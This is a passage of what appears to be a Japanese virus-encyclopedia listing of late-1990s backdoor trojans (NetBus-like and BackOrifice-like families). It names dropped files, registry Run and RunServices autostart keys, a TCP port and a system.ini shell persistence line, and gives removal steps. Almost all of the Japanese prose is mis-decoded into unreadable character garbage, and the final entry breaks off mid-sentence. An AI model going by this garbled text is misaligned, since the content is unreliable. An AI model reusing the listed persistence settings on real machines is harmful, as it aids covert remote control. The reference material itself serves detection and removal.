̾¡¡¡¡¾Î:TROJ_BCK_NBSPY-1

ÊÌ¡¡¡¡Ì¾:BACKDOOR.NBSPY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows 95 /98 / NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:625,246 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï BackDoor·Ï¥È¥í¥¤¤ÎÌÚÇϤο·¤·¤¤¥Ð¡¼¥¸
¥ç¥ó¤Î¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤Ç¤¢¤ë¡£BackOrifice¥¦¥¤¥ë¥¹¤È Ʊ¤¸¤¯¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤·¤¿¥Þ¥·¥ó¤Ç¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ ¤¹¤ë¤È¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï¥Ã¥«¡¼¤¬IP¥¢¥É ¥ì¥¹¤òÆþ¼ê¤·¤Æ¡¢¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥ê¥â¡¼¥È¥¢¥¯¥»¥¹ ¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ë¡£ ¥Ï¥Ã¥«¡¼¤Ï¡¢¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë¥Þ¥·¥ó¤ò´° Á´¤Ë¤½¤ÎÀ©¸æ²¼¤ËÃÖ¤­¡¢»×¤¤Ä̤ê¤ËÁàºî¤¹¤ë¤³¤È¤¬¤Ç¤­ ¤ë¡£Îã¤È¤·¤Æ¤Ï¡¢¥Õ¥¡¥¤¥ë¡¢±ÇÁü¡¢¥­¡¼¥Ü¡¼¥É¥·¥¹¥Æ¥à¤Î ´°Á´¤ÊÀ©¸æ¤ä¡¢¥Ç¥¹¥¯¥È¥Ã¥×¡¢¥â¥Ë¥¿¡¼¡¢¥¹¥Ô¡¼¥«¡¼¡¢CD- ROM¡¢¥Þ¥¦¥¹¡¢¥×¥ê¥ó¥¿¡¼¤ÎÀ©¸æ¡¢¥ì¥¸¥¹¥È¥ê¤Î²þÊѤʤɤ¬ µó¤²¤é¤ì¤ë¡£

TROJ_BCKDOOR.NB


̾¡¡¡¡¾Î:TROJ_BCKDOOR.NB

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:624,649 bytes

¾Ü¡¡¡¡ºÙ:¡Ý¡¡¥È¥í¥¤¤ÎÌÚÇÏ·¿¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¢
¤ë¡£Îà»÷¤Î¤â¤Î¤ËTROJ_NETBUS¤¬¤¢¤ë¡£ ¡Ý¡¡TROJ_BACKDOOR.NB¤Ë¤Ï¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥àÉôʬ¤È¥¯¥é ¥¤¥¢¥ó¥È¥×¥í¥°¥é¥àÉôʬ¤¬¤¢¤ë¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬µ¯ ư¤µ¤ì¤Æ¤¤¤ë¥Þ¥·¥ó¤ò¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤«¤é¥ê¥â ¡¼¥È¥³¥ó¥È¥í¡¼¥ë¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë ¡Ý¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¤Þ¤ºicqpro. dll ¤È icq.dll ¤È¤¤¤¦Æó¤Ä¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£ ¡Ý¡¡¼¡¤Ë¥ì¥¸¥¹¥È¥ê¡¡HKEY_LOCAL_MACHINE\SOFTWARE\ Windows 386xs\Windows Techt\General¡¡¤Ë°Ê²¼¤Î¥­¡¼¤ÈÃÍ
¤òÄɲ乤ë:
¡¡"Accept"="1" ¡¡"AccessMode"="2" ¡¡"Autostart"="1" ¡¡"TCPPort"="20034" ¡¡"Visibility"="3" ¡Ý¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¤Þ¤º¼«¿È¤Î¥³¥Ô
¡¼¤òC:\Windows\system¥Ç¥£¥ì¥¯¥È¥ê¤ËºîÀ®¤¹¤ë¡£
¡Ý¡¡¼¡¤Ë¥ì¥¸¥¹¥È¥ê¤Î¡¡HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices¡¡¤È¡¡ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run¡¡¤ËÅÐÏ¿¤ò¹Ô¤¤¡¢¥Þ¥·¥óµ¯Æ°»þ¤Ë¼«Æ° µ¯Æ°¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ë¡£

TROJ_BKDOOR.G


̾¡¡¡¡¾Î:TROJ_BKDOOR.G

ÊÌ¡¡¡¡Ì¾:BACKDOOR.TROJAN, TROJ_BACKDOOR, TROJ_

BKDOOR.G-1¡Á11, , , , , , ,ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows3.1°Ê¾å

¥¦¥¤¥ë¥¹¥µ¥¤¥º:¿ô¼ïÎढ¤ë¡ÊŽ¢¾ÜºÙŽ£¤Î¹à¡Ë

¾Ü¡¡¡¡ºÙ:BackOrifice¥¦¥¤¥ë¥¹¤ÈƱ¤¸¤¯¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ð
ͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥Ä¡¼¥ë¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢ IP¥¢¥É¥ì¥¹¤òÆþ¼ê¤·¤¿¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï ¥Ã¥«¡¼¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥¢¥¯¥»¥¹¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³ ¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ ¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥·¥¹¥Æ¥à¤¬¤¤¤Ã¤¿¤óÀ©¸æ¤µ¤ì¤ë¤È¡¢¥Ï ¥Ã¥«¡¼¤Ï»×¤¤¤É¤ª¤ê¤Ë¥³¥ó¥Ô¥å¡¼¥¿¤òÁàºî¤Ç¤­¤ë¡£Îã¤È¤· ¤Æ¤Ï¡¢¥Õ¥¡¥¤¥ë¡¢±ÇÁü¡¢¥­¡¼¥Ü¡¼¥É¥·¥¹¥Æ¥à¤Î´°Á´¤ÊÀ©¸æ ¤ä¡¢¥Ç¥¹¥¯¥È¥Ã¥×¡¢¥â¥Ë¥¿¡¼¡¢¥¹¥Ô¡¼¥«¡¼¡¢CD-ROM¡¢¥Þ¥¦ ¥¹¡¢¥×¥ê¥ó¥¿¡¼¤ÎÀ©¸æ¤Ê¤É¤¬µó¤²¤é¤ì¤ë¡£ ¥Ï¥Ã¥«¡¼¤¬¹Ô¤Ê¤¨¤ëÁàºî¤Ï¡¢¤³¤ì¤é¤Ë¸Â¤é¤ì¤¿¤â¤Î¤Ç¤Ï¤Ê ¤¯¡¢¤Û¤«¤Ë¤â¡¢¥¹¥¿¡¼¥È¥Ü¥¿¥ó¡¢¥Ç¥¹¥¯¥È¥Ã¥×¤Î¥¢¥¤¥³ ¥ó¡¢µ¯Æ°Ãæ¤Î¥×¥í¥»¥¹¡¢³«¤«¤ì¤Æ¤¤¤ë¥¦¥¤¥ó¥É¥¦¤Ê¤É¤ò²þ ¤¶¤ó¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¤µ¤é¤Ë¥Ï¥Ã¥«¡¼¤Ï¡¢¥Á¥ã¥Ã¥È·Á¼°¤Ç¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å ¡¼¥¿¤Î¥æ¡¼¥¶¡¼¤È²ñÏ乤뤳¤È¤¬¤Ç¤­¤ë¡£¤Þ¤¿¡¢´¶À÷¤·¤¿ ¥³¥ó¥Ô¥å¡¼¥¿¤Ëµ­Ï¿¤µ¤ì¤Æ¤¤¤ë¥Ñ¥¹¥ï¡¼¥É¤¹¤Ù¤Æ¤ò¥À¥¦¥ó ¥í¡¼¥É¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¡£ctrl-alt-del¤Ë¤è¤ë¥×¥í¥°¥é¥à ¤Î¶¯À©½ªÎ»¤òÀ©¸æ¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤ÎIP¥¢¥É¥ì ¥¹¤ò¥á¡¼¥ë¡¢¤Þ¤¿¤ÏICQ¥á¥Ã¥»¡¼¥¸¤Ç¥Ï¥Ã¥«¡¼¤ËÁ÷¤ë¡£
È÷¡¡¡¡¹Í:¡ãTROJ_BKDOOR.G-2¡ä
¡¡¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë£´¤Ä¤Î¥Õ¥¡¥¤¥ë¤ò ºîÀ®¤¹¤ë¡£ ¡¡window.exe¡Ê336,934¥Ð¥¤¥È¡Ë ¡¡~win.bak¡Ê336,934¥Ð¥¤¥È¡Ë ¡¡nodll.exe¡Ê32,256¥Ð¥¤¥È¡Ë ¡¡mtavre.dat¡Ê209¥Ð¥¤¥È¡Ë ¡¡¤Þ¤¿¡¢\Windows\System¥Õ¥©¥ë¥À¤Ë¡ÉLMDRKI_33.dll¡É¡Ê 17,408¥Ð¥¤¥È¡Ë¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£ ¡ãTROJ_BKDOOR.G-4¡ä ¡¡¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë£´¤Ä¤Î¥Õ¥¡¥¤¥ë¤ò ºîÀ®¤¹¤ë¡£ ¡¡window.exe¡Ê342,042¥Ð¥¤¥È¡Ë ¡¡~win.bak¡Ê342,042¥Ð¥¤¥È¡Ë ¡¡nodll.exe¡Ê32,768¥Ð¥¤¥È¡Ë ¡¡mtavre.dat¡Ê209¥Ð¥¤¥È¡Ë ¡¡¤Þ¤¿¡¢\Window\System¥Õ¥©¥ë¥À¤Ë¡ÉLMDRKI_33.dll¡É¡Ê 17,408¥Ð¥¤¥È¡Ë¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£ ¡ãTROJ_BKDOOR.G-6¡ä ¡¡¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë¡ÉKernel16.dl¡É ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£ ¡ãTROJ_BKDOOR.G-11¡ä ¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë°Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òºî À®¤¹¤ë¡£ ¡¡mtmtask.dl¡Ê335799¥Ð¥¤¥È¡Ë ¤³¤Î¥Õ¥¡¥¤¥ë¤òsystem.ini¥Õ¥¡¥¤¥ë¤Î[boot]¤Ë°Ê²¼¤Î¤è¤¦ ¤ËÅÐÏ¿¤¹¤ë¡£¤³¤Î¤¿¤áµ¯Æ°»þ¤Ëɬ¤º¼Â¹Ô¤µ¤ì¤ë¤³¤È¤Ë¤Ê ¤ë¡£ shell = Explorer.exe mtmtask.dl ¥·¥¹¥Æ¥à¤«¤éTROJ_BKDOOR.G-11¤òºï½ü¤¹¤ë¤Ë¤Ï¡¢¤³¤ÎÃͤò °Ê²¼¤Î¤è¤¦¤Ë½ñ¤­´¹¤¨¤¿¸åºÆµ¯Æ°¤·¡¢mtmtask.dl¤òºï½ü¤¹ ¤ë¡£ shell = Explorer.exe ***************************************************** **************** ¤µ¤é¤Ë¡¢¡ÉServer edit¡É¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾¤ò¤â¤ÄÆÃ¼ì¤Ê¥µ ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¤¢¤ë¡£ ¡ãTROJ_BKDOOR.G-8¡ä ¡ÉServer edit¡É¤Ï¾¤Î¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤Î¥»¥Ã¥È¥¢¥Ã¥× ¤ËÍѤ¤¤é¤ì¤ë¡£ICQ UIN(Universal Identification Number)¤ä´¶À÷¥³¥ó¥Ô¥å¡¼¥¿¤Î¥æ¡¼¥¶¡¼Ì¾¡¢¥Í¥Ã¥È¥ï¡¼¥¯¡¦ ¥Ý¡¼¥È¤Ê¤É¤òÀßÄꤹ¤ë¡£ *********** ¤Þ¤¿¤½¤Î¾¤ÎÈÖ¹æ¤Ç¸¡½Ð¤µ¤ì¤¿¤â¤Î¤Ï¡¢¥¯¥é¥¤¥¢¥ó¥È¥â¥¸ ¥å¡¼¥ë¤Ç¤¢¤ë¡£¤³¤ì¤é¤Ï¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤òÁàºî¤¹¤ë¤¿ ¤á¤Î¥Ä¡¼¥ë¤Ê¤Î¤Ç¡¢È¯¸«¤µ¤ì¤¿¾ì¹ç¤Ï¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ë ¤À¤±¤Ç¤è¤¤¡£

TROJ_BKDOOR.G-1


̾¡¡¡¡¾Î:TROJ_BKDOOR.G-1

ÊÌ¡¡¡¡Ì¾:BACKDOOR-G, TROJ_BKDOOR.G, TROJ_BKDOOR.G-2,
TROJ_BKDOOR.G-3, TROJ_BKDOOR.G-4, TROJ_BKDOOR.G-5
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1999/05

¾Ü¡¡¡¡ºÙ:ÆÃħ
¤³¤ì¤ÏPE¥¿¥¤¥×¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¹Ž¡Â¾¤Î ¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ TROJ_BKDOOR.G¥Õ¥¡¥ß¥ê¡¼¤Ï¡¢BackOrifice¥¦¥¤¥ë¥¹¤ÈƱ¤¸ ¤¯¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥Ä¡¼¥ë¤Ç¤¢ ¤ë¡£¤³¤ì¤Ï¥µ¡¼¥Ð¡¼¥¯¥é¥¤¥¢¥ó¥È·¿¥×¥í¥°¥é¥à¤Ç¡¢¥¤¥ó¥¿ ¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë ¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢IP¥¢¥É¥ì¥¹¤òÆþ¼ê¤·¤¿¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â ¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï¥Ã¥«¡¼¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥¢¥¯¥»¥¹ ¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ TROJ_BKDOOR.G-1¤Ï¡¢¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤Ë¤¢¤¿¤ë¡£ ¡Ê¾Ü¤·¤¯¤Ï¡¢TROJ_BKDOOR.G¤ò»²¾È¡£¡Ë ¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥·¥¹¥Æ¥à¤¬¤¤¤Ã¤¿¤óÀ©¸æ¤µ¤ì¤ë¤È¡¢¥Ï ¥Ã¥«¡¼¤Ï¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤òÍøÍѤ·¤Æ¡¢»×¤¤¤É¤ª¤ê ¤Ë¥³¥ó¥Ô¥å¡¼¥¿¤òÁàºî¤Ç¤­¤ë¡£Îã¤È¤·¤Æ¤Ï¡¢¥Õ¥¡¥¤¥ë¡¢±Ç Áü¡¢¥­¡¼¥Ü¡¼¥É¥·¥¹¥Æ¥à¤Î´°Á´¤ÊÀ©¸æ¤ä¡¢¥Ç¥¹¥¯¥È¥Ã¥×¡¢ ¥â¥Ë¥¿¡¼¡¢¥¹¥Ô¡¼¥«¡¼¡¢CD-ROM¡¢¥Þ¥¦¥¹¡¢¥×¥ê¥ó¥¿¡¼¤ÎÀ© ¸æ¤Ê¤É¤¬µó¤²¤é¤ì¤ë¡£ ¥Ï¥Ã¥«¡¼¤¬¹Ô¤Ê¤¨¤ëÁàºî¤Ï¡¢¤³¤ì¤é¤Ë¸Â¤é¤ì¤¿¤â¤Î¤Ç¤Ï¤Ê ¤¯¡¢¤Û¤«¤Ë¤â¡¢¥¹¥¿¡¼¥È¥Ü¥¿¥ó¡¢¥Ç¥¹¥¯¥È¥Ã¥×¤Î¥¢¥¤¥³ ¥ó¡¢µ¯Æ°Ãæ¤Î¥×¥í¥»¥¹¡¢³«¤«¤ì¤Æ¤¤¤ë¥¦¥¤¥ó¥É¥¦¤Ê¤É¤ò²þ ¤¶¤ó¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¤µ¤é¤Ë¥Ï¥Ã¥«¡¼¤Ï¡¢¥Á¥ã¥Ã¥È·Á¼°¤Ç¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å ¡¼¥¿¤Î¥æ¡¼¥¶¡¼¤È²ñÏ乤뤳¤È¤¬¤Ç¤­¤ë¡£¤Þ¤¿¡¢´¶À÷¤·¤¿ ¥³¥ó¥Ô¥å¡¼¥¿¤Ëµ­Ï¿¤µ¤ì¤Æ¤¤¤ë¥Ñ¥¹¥ï¡¼¥É¤¹¤Ù¤Æ¤ò¥À¥¦¥ó ¥í¡¼¥É¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¡£ctrl-alt-del¤Ë¤è¤ë¥×¥í¥°¥é¥à ¤Î¶¯À©½ªÎ»¤òÀ©¸æ¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤ÎIP¥¢¥É¥ì ¥¹¤ò¥á¡¼¥ë¡¢¤Þ¤¿¤ÏICQ¥á¥Ã¥»¡¼¥¸¤Ç¥Ï¥Ã¥«¡¼¤ËÁ÷¤ë¡£

TROJ_BKDOOR.G-11


̾¡¡¡¡¾Î:TROJ_BKDOOR.G-11

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN 32bit

¥¦¥¤¥ë¥¹¥µ¥¤¥º:335799bytes

¾Ü¡¡¡¡ºÙ:BackOrifice¥¦¥¤¥ë¥¹¤ÈƱ¤¸¤¯¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ð
ͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥Ä¡¼¥ë¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢ IP¥¢¥É¥ì¥¹¤òÆþ¼ê¤·¤¿¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï ¥Ã¥«¡¼¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥¢¥¯¥»¥¹¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³ ¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ ¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥·¥¹¥Æ¥à¤¬¤¤¤Ã¤¿¤óÀ©¸æ¤µ¤ì¤ë¤È¡¢¥Ï ¥Ã¥«¡¼¤Ï»×¤¤¤É¤ª¤ê¤Ë¥³¥ó¥Ô¥å¡¼¥¿¤òÁàºî¤Ç¤­¤ë¡£Îã¤È¤· ¤Æ¤Ï¡¢¥Õ¥¡¥¤¥ë¡¢±ÇÁü¡¢¥­¡¼¥Ü¡¼¥É¥·¥¹¥Æ¥à¤Î´°Á´¤ÊÀ©¸æ ¤ä¡¢¥Ç¥¹¥¯¥È¥Ã¥×¡¢¥â¥Ë¥¿¡¼¡¢¥¹¥Ô¡¼¥«¡¼¡¢CD-ROM¡¢¥Þ¥¦ ¥¹¡¢¥×¥ê¥ó¥¿¡¼¤ÎÀ©¸æ¤Ê¤É¤¬µó¤²¤é¤ì¤ë¡£ ¥Ï¥Ã¥«¡¼¤¬¹Ô¤Ê¤¨¤ëÁàºî¤Ï¡¢¤³¤ì¤é¤Ë¸Â¤é¤ì¤¿¤â¤Î¤Ç¤Ï¤Ê ¤¯¡¢¤Û¤«¤Ë¤â¡¢¥¹¥¿¡¼¥È¥Ü¥¿¥ó¡¢¥Ç¥¹¥¯¥È¥Ã¥×¤Î¥¢¥¤¥³ ¥ó¡¢µ¯Æ°Ãæ¤Î¥×¥í¥»¥¹¡¢³«¤«¤ì¤Æ¤¤¤ë¥¦¥¤¥ó¥É¥¦¤Ê¤É¤ò²þ ¤¶¤ó¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¤µ¤é¤Ë¥Ï¥Ã¥«¡¼¤Ï¡¢¥Á¥ã¥Ã¥È·Á¼°¤Ç¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å ¡¼¥¿¤Î¥æ¡¼¥¶¡¼¤È²ñÏ乤뤳¤È¤¬¤Ç¤­¤ë¡£¤Þ¤¿¡¢´¶À÷¤·¤¿ ¥³¥ó¥Ô¥å¡¼¥¿¤Ëµ­Ï¿¤µ¤ì¤Æ¤¤¤ë¥Ñ¥¹¥ï¡¼¥É¤¹¤Ù¤Æ¤ò¥À¥¦¥ó ¥í¡¼¥É¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¡£ctrl-alt-del¤Ë¤è¤ë¥×¥í¥°¥é¥à ¤Î¶¯À©½ªÎ»¤òÀ©¸æ¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤ÎIP¥¢¥É¥ì ¥¹¤ò¥á¡¼¥ë¡¢¤Þ¤¿¤ÏICQ¥á¥Ã¥»¡¼¥¸¤Ç¥Ï¥Ã¥«¡¼¤ËÁ÷¤ë¡£
¾É¾õ:
¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë°Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òºî À®¤¹¤ë¡£ ¡¡mtmtask.dl¡Ê335799¥Ð¥¤¥È¡Ë ¤³¤Î¥Õ¥¡¥¤¥ë¤òsystem.ini¥Õ¥¡¥¤¥ë¤Î[boot]¤Ë°Ê²¼¤Î¤è¤¦ ¤ËÅÐÏ¿¤¹¤ë¡£¤³¤Î¤¿¤áµ¯Æ°»þ¤Ëɬ¤º¼Â¹Ô¤µ¤ì¤ë¤³¤È¤Ë¤Ê ¤ë¡£ shell = Explorer.exe mtmtask.dl ----------------------------------------- BACKDOOR·Ï¤Ë¤ÏÈó¾ï¤Ë¿¤¯¤Î°¡¼ï¤¬Â¸ºß¤·¡¢°ì¤Ä¤Î¥Ñ¥¿ ¡¼¥ó¤Ç¤¤¤¯¤Ä¤â¸¡½Ð¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£TROJ_BKDOOR.G-11
¤Ç¸¡½Ð¤Ç¤­¤ë°¡¼ï¤Ë¤Ï¡¢C:\Windows¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Ë¼«
ʬ¼«¿È¤Î¥³¥Ô¡¼¤òºîÀ®¤·¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤ËÃͤòÅÐÏ¿¤¹ ¤ë¡£ HKEY_LOCAL_MACHINES\Software\MicroSoft\Windows\
CurrentVersion\RunServicesÃÍ:KERNEL32 ¥Ç¡¼¥¿:C:\
Windows\(¸µ¤Î¼Â¹Ô¥Õ¥¡¥¤¥ë̾)
È÷¡¡¡¡¹Í:¥·¥¹¥Æ¥à¤«¤éTROJ_BKDOOR.G-11¤òºï½ü¤¹¤ë¤Ë
¤Ï¡¢¤³¤ÎÃͤò°Ê²¼¤Î¤è¤¦¤Ë½ñ¤­´¹¤¨¤¿¸åºÆµ¯Æ°¤·¡¢ mtmtask.dl¤òºï½ü¤¹¤ë¡£ shell = Explorer.exe -------------------------------- °¡¼ï¤Î¾ì¹ç¤Ï¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤ò»ÈÍѤ·¤Æ¡¢°Ê²¼¤ÎÃͤò ºï½ü¤¹¤ë¡£(Windows98¤Î¾ì¹ç¤Ï¡¢¥·¥¹¥Æ¥àÀßÄê¥æ¡¼¥Æ¥£¥ê ¥Æ¥£¤òÍøÍѤ·¤Æ¡¢KERNEL32¤È¤¤¤¦ÃͤΥÁ¥§¥Ã¥¯¤ò¤Ï¤º¤¹¤È ¤è¤¤¡£) HKEY_LOCAL_MACHINES\Software\MicroSoft\Windows\
CurrentVersion\RunServicesÃÍ:KERNEL32 ¥Ç¡¼¥¿:C:\
Windows\(¸µ¤Î¼Â¹Ô¥Õ¥¡¥¤¥ë̾)

TROJ_BLAY


̾¡¡¡¡¾Î:TROJ_BLAY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:.EXE¡ÊDOS¡Ë

¥¦¥¤¥ë¥¹¥µ¥¤¥º:13721bytes

¾Ü¡¡¡¡ºÙ:¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢¥æ¡¼¥¶¡¼¤¬ÉÔ
Ãí°Õ¤Ë¼Â¹Ô¤·¤Æ¤·¤Þ¤¦¤È¡¢¥É¥é¥¤¥ÖC¤Î¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È ¥ê¤Ë¤¢¤ë.COM¤ª¤è¤Ó.EXE¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤è¤¦¤È¤¹¤ë¡£¤Þ ¤¿¡¢¥·¥¹¥Æ¥à¤ò¥Ï¥ó¥°¥¢¥Ã¥×¤µ¤»¤ë¡£

TROJ_BLEEM.C


̾¡¡¡¡¾Î:TROJ_BLEEM.C

ÊÌ¡¡¡¡Ì¾:BLEEM.EXE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win 95/98/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:454 Kb

¾Ü¡¡¡¡ºÙ:¤³¤Î¥×¥í¥°¥é¥à¤ÏPlay Station¤Î¥¨¥ß¥å¥ì¡¼¥¿
